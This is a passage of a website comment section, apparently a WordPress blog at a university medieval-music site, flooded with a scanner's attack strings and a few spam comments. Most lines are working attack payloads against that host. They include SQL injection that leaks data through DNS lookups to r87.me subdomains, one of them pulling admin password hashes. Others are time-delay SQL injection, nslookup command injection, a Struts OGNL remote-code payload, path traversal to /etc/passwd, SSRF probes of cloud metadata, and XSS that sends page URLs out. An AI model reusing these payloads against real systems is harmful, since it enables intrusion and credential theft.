Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.
(select UTL_INADDR.GET_HOST_ADDRESS(chr(105)||chr(110)||chr(106)||chr(121)||chr(97)||chr(115)||chr(103)||chr(122)||chr(103)||chr(53)||chr(108)||chr(102)||chr(100)||chr(107)||chr(55)||chr(99)||chr(118)||chr(109)||chr(45)||chr(116)||chr(115)||chr(116)||chr(121)||chr(53)||chr(121)||chr(113)||chr(56)||chr(118)||chr(109)||chr(121)||chr(107)||chr(122)||chr(57)||chr(108)||chr(113)||chr(110)||chr(99)||chr(105)||chr(110)||chr(115)||chr(116)||chr(98)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(116)||chr(106)||chr(110)||chr(118)||chr(109)||chr(111)||chr(110)||chr(110)||chr(105)||chr(106)||chr(107)||chr(105)||chr(109)||chr(111)||chr(114)||chr(103)||chr(119)||chr(103)||chr(113)||chr(107)||chr(115)||chr(121)||chr(102)||chr(57)||chr(108)||chr(110)||chr(105)||chr(97)||chr(122)||chr(99)||chr(106)||chr(122)||chr(112)||chr(54)||chr(104)||chr(53)||chr(113)||chr(122)||chr(98)||chr(122)||chr(57)||chr(108)||chr(109)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
3
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(113)||chr(102)||chr(105)||chr(100)||chr(99)||chr(105)||chr(122)||chr(112)||chr(97)||chr(104)||chr(113)||chr(103)||chr(115)||chr(103)||chr(108)||chr(101)||chr(113)||chr(55)||chr(57)||chr(101)||chr(114)||chr(103)||chr(113)||chr(116)||chr(115)||chr(95)||chr(112)||chr(100)||chr(109)||chr(111)||chr(120)||chr(122)||chr(111)||chr(120)||chr(116)||chr(99)||chr(98)||chr(110)||chr(111)||chr(104)||chr(121)||chr(114)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(‘rps2fkkh9wdpc1bny2j_81dnkln7t-zuy1iawtu1’||’4qu.r87.me’) from DUAL))))
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(114)||chr(112)||chr(115)||chr(50)||chr(102)||chr(107)||chr(107)||chr(104)||chr(57)||chr(119)||chr(53)||chr(109)||chr(107)||chr(95)||chr(108)||chr(104)||chr(119)||chr(110)||chr(120)||chr(121)||chr(105)||chr(99)||chr(103)||chr(98)||chr(106)||chr(121)||chr(110)||chr(117)||chr(111)||chr(51)||chr(49)||chr(98)||chr(104)||chr(102)||chr(121)||chr(101)||chr(106)||chr(100)||chr(50)||chr(104)||chr(111)||chr(55)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(103)||chr(114)||chr(110)||chr(108)||chr(114)||chr(105)||chr(56)||chr(118)||chr(111)||chr(104)||chr(54)||chr(121)||chr(56)||chr(105)||chr(106)||chr(102)||chr(116)||chr(48)||chr(109)||chr(113)||chr(107)||chr(122)||chr(120)||chr(109)||chr(48)||chr(101)||chr(51)||chr(107)||chr(106)||chr(108)||chr(109)||chr(97)||chr(122)||chr(109)||chr(122)||chr(106)||chr(115)||chr(102)||chr(109)||chr(98)||chr(53)||chr(118)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(103)||chr(114)||chr(110)||chr(108)||chr(114)||chr(105)||chr(56)||chr(118)||chr(111)||chr(104)||chr(45)||chr(109)||chr(97)||chr(112)||chr(110)||chr(118)||chr(99)||chr(100)||chr(50)||chr(105)||chr(117)||chr(102)||chr(109)||chr(51)||chr(101)||chr(100)||chr(113)||chr(103)||chr(107)||chr(52)||chr(121)||chr(97)||chr(110)||chr(115)||chr(108)||chr(114)||chr(117)||chr(112)||chr(49)||chr(112)||chr(99)||chr(95)||chr(119)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’
With havin so much written content do you ever run into any
issues of plagorism or copyright violation? My blog has a lot of exclusive
content I’ve either written myself or outsourced but it appears a lot of it is popping it up
all over the web without my authorization. Do you know any
solutions to help reduce content from being stolen? I’d certainly appreciate it.
Why users still make use of to read news papers when in this technological globe everything is
accessible on web?
declare @h varchar(999)select @h=’1’+substring(name+’-‘+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+’.iyw6-m1dpqkkx5fj6bvhtiazsdxb88i_jen8rl_m’+’7im.r87.me’ from sys.sql_logins WHERE principal_id=1;exec(‘xp_dirtree ”\\’+@h+’\c$”’)
(select UTL_INADDR.GET_HOST_ADDRESS(chr(105)||chr(121)||chr(119)||chr(54)||chr(45)||chr(109)||chr(49)||chr(100)||chr(112)||chr(113)||chr(100)||chr(107)||chr(112)||chr(104)||chr(122)||chr(114)||chr(55)||chr(50)||chr(104)||chr(106)||chr(97)||chr(110)||chr(95)||chr(122)||chr(117)||chr(97)||chr(97)||chr(50)||chr(116)||chr(106)||chr(98)||chr(111)||chr(119)||chr(54)||chr(115)||chr(102)||chr(52)||chr(104)||chr(49)||chr(117)||chr(100)||chr(115)||chr(101)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
syscolumns WHERE 2>3;exec(‘xp_dirtree ”\\ocbpirflregcs5lzeua6fq2l0zjxobhoskhji5vn’+’th4.r87.me’+’\c$\a”’)–
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(111)||chr(99)||chr(98)||chr(112)||chr(105)||chr(114)||chr(102)||chr(108)||chr(114)||chr(101)||chr(51)||chr(98)||chr(57)||chr(122)||chr(117)||chr(116)||chr(45)||chr(95)||chr(121)||chr(105)||chr(112)||chr(106)||chr(52)||chr(99)||chr(118)||chr(98)||chr(109)||chr(51)||chr(116)||chr(101)||chr(108)||chr(114)||chr(102)||chr(119)||chr(112)||chr(97)||chr(106)||chr(105)||chr(98)||chr(103)||chr(117)||chr(113)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.
3
3
3
3
3
3
1″ OR 1=1 OR “1”=”1
3
3
3
http://example.com/?
ns: netsparker056650=vuln
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x–
3
<!DOCTYPE ns []>&lfi;
3
3
3
3
3
c:\windows\win.ini
/../../../../../../../../../../windows/iis6.log
/../../../../../../../../../../var/log/apache2/error.log
3
3
::1/trace.axd
127.100.11.2/elmah.axd
https://medievalmusic.ace.fordham.edu/elmah
3
3
3
3
1′))exec(‘xp_dirtree ”\\idehs6telrsyoa7p31wckfor8897ghnuif8tzhav’+’rbg.r87.me’+’\c$\a”’)–
(select UTL_INADDR.GET_HOST_ADDRESS(‘idehs6telr8zb8y0n92zuqaz2-6rez1ywhlwfvou’||’cde.r87.me’) from DUAL)
3
3
3
gethostbyname(trim(‘idehs6telrxeayuy_w91yrg5dssmygshp8hxflf1′.’d28.r87.me’))
+createobject(“WScript.Shell”).exec(“nslookup idehs6telr2akwu8mfj4xbdl-tm5tttcs3trtky2” & “bws.r87.me”).StdOut.ReadAll
01527166732/trace.axd
13.6090202/trace.axd
3
3
3
3
3
http://r87.com/?medievalmusic.ace.fordham.edu/
http://r87.com/?medievalmusic.ace.fordham.edu/
https://r87.com/?medievalmusic.ace.fordham.edu/
https://r87.com/?medievalmusic.ace.fordham.edu/
//r87.com/?http://medievalmusic.ace.fordham.edu/
//r87.com/?http://medievalmusic.ace.fordham.edu/
r87.com/?medievalmusic.ace.fordham.edu/
r87.com/?medievalmusic.ace.fordham.edu/
r87.com/?http://medievalmusic.ace.fordham.edu/
r87.com/?http://medievalmusic.ace.fordham.edu/
r87.com/?https://medievalmusic.ace.fordham.edu/
r87.com/?https://medievalmusic.ace.fordham.edu/
/\r87.com/?medievalmusic.ace.fordham.edu/
/\r87.com/?medievalmusic.ace.fordham.edu/
///r87.com/?medievalmusic.ace.fordham.edu/
///r87.com/?medievalmusic.ace.fordham.edu/
medievalmusic.ace.fordham.edu.r87.com/?
medievalmusic.ace.fordham.edu.r87.com/?
http://medievalmusic.ace.fordham.edu.r87.com/?
http://medievalmusic.ace.fordham.edu.r87.com/?
https://medievalmusic.ace.fordham.edu.r87.com/?
https://medievalmusic.ace.fordham.edu.r87.com/?
3
3
3
1 OR 1=1
3
3
${268409241-5}
‘)) WAITFOR DELAY ‘0:0:25’–
1)) WAITFOR DELAY ‘0:0:25’–
3
arguments[1].end(require(‘child_process’).execSync(‘expr 268409241 – 22’))
ns../../../../../../../../../../../boot.ini…………………………………………………………………………………………………………………………………………………………………
3
/../../../../../../../../../../../etc/passwd
netsparker(0x023BBF);
https://medievalmusic.ace.fordham.edu/elmah.axd
‘;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//injyasgzg59hiyy-tyt_pxsibhlww9zih-xjlz8l”+”mdo.r87.me/r/?”+location.href;document.head.appendChild(l);//
3
exec(‘xp_dirtree ”\\injyasgzg5nzv4qt-2edvc-th3nn7tnm5a5zgkgf’+’hcs.r87.me’+’\c$\a”’)
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = ‘SELECT * FROM OPENROWSET(”SQLOLEDB”,”@”;”a”;”1”,”SELECT 1”)’SET @r=replace(@q,’@’,’injyasgzg5jwx0dn_eh2crahdekgj0u3ywe1ksaz’+’2sg.r87.me’)exec sp_executesql @r–
(select UTL_INADDR.GET_HOST_ADDRESS(chr(105)||chr(110)||chr(106)||chr(121)||chr(97)||chr(115)||chr(103)||chr(122)||chr(103)||chr(53)||chr(108)||chr(102)||chr(100)||chr(107)||chr(55)||chr(99)||chr(118)||chr(109)||chr(45)||chr(116)||chr(115)||chr(116)||chr(121)||chr(53)||chr(121)||chr(113)||chr(56)||chr(118)||chr(109)||chr(121)||chr(107)||chr(122)||chr(57)||chr(108)||chr(113)||chr(110)||chr(99)||chr(105)||chr(110)||chr(115)||chr(116)||chr(98)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
gethostbyname(trim(‘injyasgzg5kpcdqospg95thx7hlempb13cbgbcu7′.’vpg.r87.me’))
+createobject(“WScript.Shell”).exec(“nslookup injyasgzg5qhxxt9dk3kfgsqvkrgcgkuiwjiaaso” & “lfk.r87.me”).StdOut.ReadAll+
“& nslookup injyasgzg5llfflt3vx002gfb7btwk9f7cgbceef^t08.r87.me&’\”`0&nslookup injyasgzg5llfflt3vx002gfb7btwk9f7cgbceef^t08.r87.me&`’
“& nslookup injyasgzg5ozywhdtcncn1trmmbk_kupvjffaaw7^yy8.r87.me&’\”`0&nslookup injyasgzg5ozywhdtcncn1trmmbk_kupvjffaaw7^yy8.r87.me&`’
nslookup “injyasgzg5m_4beb0iwlkld8obswcimqdom4mosl””qtk.r87.me”
nslookup “injyasgzg5tvdgbcem3gsoxve5alfvlrwvdfgx2k””m8o.r87.me”
&nslookup “injyasgzg5fdtbqoyp9lfmpp23ucmhrwnqufotis””ytg.r87.me”
&nslookup “injyasgzg58d34by-fdigym9jhdulzscbknqrmzm””5da.r87.me”
‘&nslookup “injyasgzg5dct334wmwmc0dkwzk-k_m8tbudsrdb””gr4.r87.me”
‘&nslookup “injyasgzg5osasbrynh4uirnobcuonikvmmdbeay””wne.r87.me”
“&nslookup “injyasgzg5u4plpajrdb7ggeyizp5reshg39x-xd””kz4.r87.me”
“&nslookup “injyasgzg5wpiskflvcdhopasr0mrkgvcm4ztiek””cla.r87.me”
|nslookup${IFS}”injyasgzg5xiwp3ztjeccwhryumtze7qns4g_gu-“”viu.r87.me”
|nslookup${IFS}”injyasgzg56rgmg7mmvzx3abfzcxscbmcx08b0-r””lbu.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”injyasgzg59vjwqvp2br6cuk4aq-ss4p3skmp3jm””dxw.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
3
3
“& SET /A 0xFFF9999-2 &
3
3
‘||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||’
1′;SELECT pg_sleep(25)–
${28275*28275-(13)}
<!DOCTYPE ns []>&lfi;
print(int)0xFFF9999-22
print(int)0xFFF9999-22
/../../../../../../../../../../proc/self/fd/2.php
‘>
3
body{x:expression(netsparker(0x03B00A))}
127.100.11.2/trace.axd
'+netsparker(0x03B019)+'
http://::1:22
http://::1:22
http://127.0.0.1:3306
http://127.0.0.1:3306
1))exec(‘xp_dirtree ”\\tjnvmonnijpk0cp2wwk18jqm0m5xd0798x-vincr’+’7-i.r87.me’+’\c$\a”’)–
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(116)||chr(106)||chr(110)||chr(118)||chr(109)||chr(111)||chr(110)||chr(110)||chr(105)||chr(106)||chr(107)||chr(105)||chr(109)||chr(111)||chr(114)||chr(103)||chr(119)||chr(103)||chr(113)||chr(107)||chr(115)||chr(121)||chr(102)||chr(57)||chr(108)||chr(110)||chr(105)||chr(97)||chr(122)||chr(99)||chr(106)||chr(122)||chr(112)||chr(54)||chr(104)||chr(53)||chr(113)||chr(122)||chr(98)||chr(122)||chr(57)||chr(108)||chr(109)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
gethostbyname(trim(‘tjnvmonnijbwllhyy8apvx3zqneoiks8syhxa8aa’.’l0w.r87.me’))
+createobject(“WScript.Shell”).exec(“nslookup tjnvmonnijp1v2ctjrclmhpqxyrge0qmqrcfbzsm” & “lze.r87.me”).StdOut.ReadAll
‘& nslookup tjnvmonnijlkj2z6kxauzgm27hbkbykhz2axdn-4^llm.r87.me&’\”`0&nslookup tjnvmonnijlkj2z6kxauzgm27hbkbykhz2axdn-4^llm.r87.me&`’
“& nslookup tjnvmonnijqq1y4nf4zkadzymbexlpeqkffmfl0c^wvc.r87.me&’\”`0&nslookup tjnvmonnijqq1y4nf4zkadzymbexlpeqkffmfl0c^wvc.r87.me&`’
“& nslookup tjnvmonnijoup14thm_eq_qtm2nwn_wdlgjdrewr^ils.r87.me&’\”`0&nslookup tjnvmonnijoup14thm_eq_qtm2nwn_wdlgjdrewr^ils.r87.me&`’
nslookup “tjnvmonnijg9puau9yokh3keianrums5go0iayc1″”fku.r87.me”
nslookup “tjnvmonnijhy_elzm2joiaupvlaqqmhz4p8jcjyw””bue.r87.me”
&nslookup “tjnvmonnijg4_mjqe_rzwztnv9xbpjd8wlazrbot””rik.r87.me”
&nslookup “tjnvmonnijxtn2kaiqwtonajq3r0zmuvtjzpzn81″”e2a.r87.me”
‘&nslookup “tjnvmonnij83uiibkobtiy-fav1cm_3pvmdqshak””yam.r87.me”
‘&nslookup “tjnvmonnijjjyqyit9c0mq2sr-djoz07yhpcpqkb””74o.r87.me”
“&nslookup “tjnvmonnijckkfcbv76v4r-ysfmwfnh3yygbd9fm””phk.r87.me”
“&nslookup “tjnvmonnijqn_bdg7hqb_0ptmdt5kyw-edr_unzy””-x0.r87.me”
|nslookup${IFS}”tjnvmonnijg65jpve0v6s61iiiwl_uu9gbiq1xrj””nhk.r87.me”
|nslookup${IFS}”tjnvmonnij4umac_t_rh1ijlsoexrg_s3zwee3mi””g4o.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”tjnvmonnijbkgj_irr3acv5rutgh98urxgaoflol””nzu.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
3
3
“& SET /A 0xFFF9999-2 &
3
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
3
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)– 1
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x–
${28275*28275-(13)}
-1″ or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+”
3
3
3
<!DOCTYPE r [ %dtd;]>&a;
‘”–>netsparker(0x020AF2)
‘;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//rzfpdhilruke-2iu5dfal6t7ybrapyzk8gn0q4cd”+”8m4.r87.me/r/?”+location.href;document.head.appendChild(l);//
medievalmusic.ace.fordham.edu/elmah
body{x:expression(netsparker(0x020B18))}
http://aws.r87.me/latest/meta-data/public-hostname
*/netsparker(0x020B1B);/*
3
1′)exec(‘xp_dirtree ”\\rzfpdhilrug8unk5hm4urb7jkz8gglcfbkwxkgji’+’pzy.r87.me’+’\c$\a”’)–
(select UTL_INADDR.GET_HOST_ADDRESS(‘rzfpdhilrudaatkegrdaa1r878rrm-iumpmqur93’||’azk.r87.me’) from DUAL)
gethostbyname(trim(‘rzfpdhilrulryn94kq_u0ec-5ifr-aemy9w5bc0q’.’mnc.r87.me’))
eval(‘gethostbyname(lc ‘rzfpdhilruudblr9ensa3w06lp1pdqmkofc4-1f3′.’c_e.r87.me’)’)
|nslookup${IFS}”rzfpdhilru6wyy5_h3gfnky2bnxlm76e9oudntw8″”iy4.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”rzfpdhilrungf6bz2b-qp7o75ccnac4qd6pjxuk9″”yny.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
3
3
3
3
| SET /A 0xFFF9999-2
3
%27
%27
“+print localtime()*0+0xFFF9999-22+”
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x–
arguments[1].end(require(‘child_process’).execSync(‘set /A 268409241 – 22’))
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x–
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x–
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDhBOTE4KTwvc2NyaXB0Pg==
3
3
n;ns:expression(netsparker(0x08A937));
3
3
‘”@–>netsparker(0x08A94B)
exec(‘xp_dirtree ”\\bv9l86uf0suoeg96ij4ggndn1ng_g-skjzvetu6r’+’sfw.r87.me’+’\c$\a”’)
SELECT dblink_connect(‘host=bv9l86uf0saxcl3zj6ceib9nxbhdwowwjr0h8daw’||’onc.r87.me user=a password=a connect_timeout=2’)
gethostbyname(trim(‘bv9l86uf0slj4gjiu6ego3v3ppxqk-pzzc64zdfy’.’lu8.r87.me’))
gethostbyname(lc ‘bv9l86uf0sxc9osnyknp2jijssdkfkaslipt05qe’.’y7k.r87.me’)
“&nslookup “bv9l86uf0stgttvmc2l7pef-mgxgafsj17vdpxw4″”vho.r87.me”
|nslookup${IFS}”bv9l86uf0sqg8mnepo2vkhfyatrzlqexqlkk9fny””xqe.r87.me”
|nslookup${IFS}”bv9l86uf0sai6fb9qmcwwrkfadbmmyd-ztx9mufa””p3y.r87.me”
Moja strona www: Odzyskiwanie danych po formacie
3
3
3
‘
3
3
‘) WAITFOR DELAY ‘0:0:25’–
http://r87.com/n
3
3
((select sleep(25)))a– 1
#{28275*28275-(13)}
3
3
((select sleep(25)))a– 1
#{28275*28275-(13)}
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
3
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
3
/../../../../../../../../../../var/log/apache/error.log
3
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
3
/../../../../../../../../../../proc/version
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
qfidcizpahfgn0gpdaeni43jnp8y1h_xg3r1ng-1l4k.r87.me
3
3
3
qfidcizpahcnvgahyt_x37uz1xanjxrtwwe3t7zl31k.r87.me
3
‘”–>
3
3
http://qfidcizpahobccuyiqpwsa1i6uuvhuee1cmloer27zz.r87.me/p/
3
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = ‘SELECT * FROM OPENROWSET(”SQLOLEDB”,”@”;”a”;”1”,”SELECT 1”)’SET @r=replace(@q,’@’,’qfidcizpah0wnls_lhuuuqza8lgic6khbpstfdeh’+’5p4.r87.me’)exec sp_executesql @r–
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(113)||chr(102)||chr(105)||chr(100)||chr(99)||chr(105)||chr(122)||chr(112)||chr(97)||chr(104)||chr(113)||chr(103)||chr(115)||chr(103)||chr(108)||chr(101)||chr(113)||chr(55)||chr(57)||chr(101)||chr(114)||chr(103)||chr(113)||chr(116)||chr(115)||chr(95)||chr(112)||chr(100)||chr(109)||chr(111)||chr(120)||chr(122)||chr(111)||chr(120)||chr(116)||chr(99)||chr(98)||chr(110)||chr(111)||chr(104)||chr(121)||chr(114)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’
https://medievalmusic.ace.fordham.edu/trace.axd
https://medievalmusic.ace.fordham.edu/trace.axd
gethostbyname(trim(‘qfidcizpahqtuiajdyosrmqm600lsiflh5dbo4im’.’bqm.r87.me’))
eval(‘gethostbyname(lc ‘qfidcizpahahc3irsc74ncl2hp8kte7n16ccfn-h’.’bzk.r87.me’)’)
0x7f.1/trace.axd
https://medievalmusic.ace.fordham.edu/elmah
medievalmusic.ace.fordham.edu/elmah
13.92.237.218/elmah
13.92.237.218/elmah
127.100.11.2/elmah
127.100.11.2/elmah
::1/elmah
::1/elmah
127.0.0.1/elmah
127.0.0.1/elmah
http://aws.r87.me/latest/meta-data/public-hostname
http://169.254.169.254/latest/meta-data/public-hostname
http://169.254.169.254/latest/meta-data/public-hostname
http://127.0.0.1:22
http://127.0.0.1:22
http://13.92.237.218:22
http://13.92.237.218:22
http://13.92.237.218:3306
http://13.92.237.218:3306
http://::1:3306
http://::1:3306
https://medievalmusic.ace.fordham.edu/server-status
https://medievalmusic.ace.fordham.edu/server-status
3
3
3
NS1NO
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
1) WAITFOR DELAY ‘0:0:25’–
http://r87.com/n
‘+print(int)0xFFF9999-22+’
{{268409241-5}}
3
/../../../../../../../../../../windows/win.ini
{{268409241-5}}
3
file:/windows/win.ini
${268409241-5}
medievalmusic.ace.fordham.edu/trace.axd
1 ns=netsparker(0x1C4DBB)
/../../../../../../../../../../proc/version.php
3
3
//r87.com/n/n.css?0x1C4DC4
3
‘”–>
3
ns(0x1C4DD0)
“;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//7e4dabqs8tju_tm7jiveavbmpebepgjayze6zwu2″+”eim.r87.me/r/?”+location.href;document.head.appendChild(l);//
3
ns(0x1C4DD1)
exec(‘xp_dirtree ”\\7e4dabqs8tcoxy8p76sbdhc5_bdytkaltjffdu6k’+’j3c.r87.me’+’\c$\a”’)
‘;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//7e4dabqs8tajnc4eqcfcoimuu1ibzhtjnlgkyqqn”+”asm.r87.me/r/?”+location.href;document.head.appendChild(l);//
3
n;ns:expression(netsparker(0x1C4DD4));
‘;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//7e4dabqs8th2vsrjmuh49ygt9lm5holchhsfiud0″+”7r4.r87.me/r/?”+location.href;document.head.appendChild(l);//
n;ns:expression(netsparker(0x1C4DD5));
body{x:expression(netsparker(0x1C4DDD))}
gethostbyname(trim(‘7e4dabqs8tlsr5jcgfatfnzpwj6s9qhhgm2xm9kc’.’axy.r87.me’))
“+createobject(“WScript.Shell”).exec(“nslookup 7e4dabqs8tv7js0pgaznylsrjlfra6umrzacyktj” & “hhc.r87.me”).StdOut.ReadAll+”
“&nslookup “7e4dabqs8t1tiqt58c6hhgnz2h_qtmzsaqggb1wm””-kq.r87.me”
body{x:expression(netsparker(0x1C4DDE))}
“&nslookup “7e4dabqs8te0gpbpimcifqnl0uancpmjuf-t0blb””ssy.r87.me”
'+netsparker(0x1C4E7E)+'
|nslookup${IFS}”7e4dabqs8thltzotxh9qx8giczch-iiidnxsync_””oi0.r87.me”
‘”@–>netsparker(0x1C4E7F)
|nslookup${IFS}”7e4dabqs8twl846qspc2skl820ysa5hrpzgar2vd””w9k.r87.me”
%22%2bnetsparker(0x1C4E9E)%2b%22
